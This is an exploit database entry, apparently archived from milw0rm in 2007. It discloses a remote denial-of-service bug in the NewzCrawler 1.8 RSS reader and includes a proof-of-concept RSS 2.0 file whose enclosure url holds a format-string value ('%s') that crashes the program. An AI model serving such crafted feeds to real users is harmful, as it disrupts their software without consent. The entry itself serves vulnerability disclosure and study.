header-logo
Suggest Exploit
vendor:
NewzCrawler
by:
gbr
N/A
CVSS
N/A
Remote Denial of Service
Unknown
CWE
Product Name: NewzCrawler
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP2
2007

NewzCrawler 1.8 Remote Denial of Service

NewzCrawler 1.8 becomes unstable and crashes when parsing the 'url' attribute of the 'enclosure' sub-element containing some invalid strings while showing a new item of an RSS 2.0 file.

Mitigation:

Unknown
Source

Exploit-DB raw data:

NewzCrawler 1.8 Remote Denial of Service
Credits: gbr
Tested on Windows XP SP2

NewzCrawler 1.8 becomes usntable and begin crash when parsering the 'url' atribute of
'enclosure' sub-element contends some invalid string* at time of show a new item of a 
RSS 2.0 file.

* '%s', '%Y', '%%', 'n,', and others.

PoC:

<?xml version="1.0"?>
<rss version="2.0">

<channel>
        <title>Test</title>
        <link></link>
        <description></description>

        <item>
                <title>Remote DoS PoC</title>
                <enclosure url="%s"/>
        </item>
</channel>
</rss>

# milw0rm.com [2007-05-15]

Navigation

Suggest Exploit

Services By CQR